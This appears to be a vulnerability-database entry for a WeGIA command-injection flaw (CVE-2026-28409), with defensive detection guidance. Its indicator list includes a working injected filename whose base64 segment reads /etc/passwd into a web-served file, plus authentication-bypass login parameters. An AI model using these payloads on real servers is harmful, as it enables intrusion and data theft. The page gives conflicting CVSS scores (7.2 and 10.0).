cbcvebase.
CVE-2026-28409
published 2026-02-27

CVE-2026-28409: WeGIA is a web manager for charitable institutions. Prior to version 3.6.5, a critical Remote Code Execution (RCE) vulnerability exists in the WeGIA…

PriorityP261high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
3.31%
87.0th percentile
WeGIA is a web manager for charitable institutions. Prior to version 3.6.5, a critical Remote Code Execution (RCE) vulnerability exists in the WeGIA application's database restoration functionality. An attacker with administrative access (which can be obtained via the previously reported Authentication Bypass) can execute arbitrary OS commands on the server by uploading a backup file with a specifically crafted filename. Version 3.6.5 fixes the issue.

Affected

2 ranges
VendorProductVersion rangeFixed in
labredescefetrjwegia< 3.6.53.6.5
wegiawegia< 3.6.53.6.5

Detection & IOCsextracted from sources · hover to see the quote

url/WeGIA/html/login.php
url/WeGIA/html/configuracao/importar_dump.php
url/WeGIA/html/configuracao/gerenciar_backup.php
filenamedump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz
commandcat /etc/passwd > /var/www/html/WeGIA/$F.txt
path/var/www/html/WeGIA/
bytes
1f8b08000000000000030300000000000000000000
  • Look for multipart POST requests to /WeGIA/html/configuracao/importar_dump.php where the uploaded filename contains shell metacharacters (semicolons, pipe characters, base64-encoded payloads) indicative of command injection via crafted backup filename.
  • Detect GET requests to gerenciar_backup.php with an action=restore parameter whose file= value contains URL-encoded shell metacharacters (%3B = ';', %7C = '|') and base64 strings, indicating RCE exploitation attempt.
  • Monitor for the creation of unexpected .txt files under /var/www/html/WeGIA/ (e.g., <random>.txt) which are the exfiltration artifacts written by the injected command (cat /etc/passwd > /var/www/html/WeGIA/$F.txt).
  • The exploit chain begins with an authentication bypass POST to /WeGIA/html/login.php using hardcoded parameters c=true&cpf=admin&id_pessoa=1 — alert on this specific login payload pattern.
  • Regex match on HTTP response body for 'root:.*:0:0:' to confirm successful /etc/passwd exfiltration via the RCE payload.
  • ·The exploit requires administrative access, which can be chained from a prior authentication bypass vulnerability in WeGIA. The CVSS score of 10.0 with PR:N reflects the chained attack scenario, not standalone exploitation of this RCE.
  • ·The Nuclei template uses a randomized 8-character lowercase alpha filename variable ({{to_lower(rand_text_alpha(8))}}) as the exfiltration artifact name; detection rules based on static filenames will miss this.
  • ·Affected versions are WeGIA <= 3.6.4; version 3.6.5 patches the issue. Ensure version fingerprinting is used to scope detection to unpatched instances.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.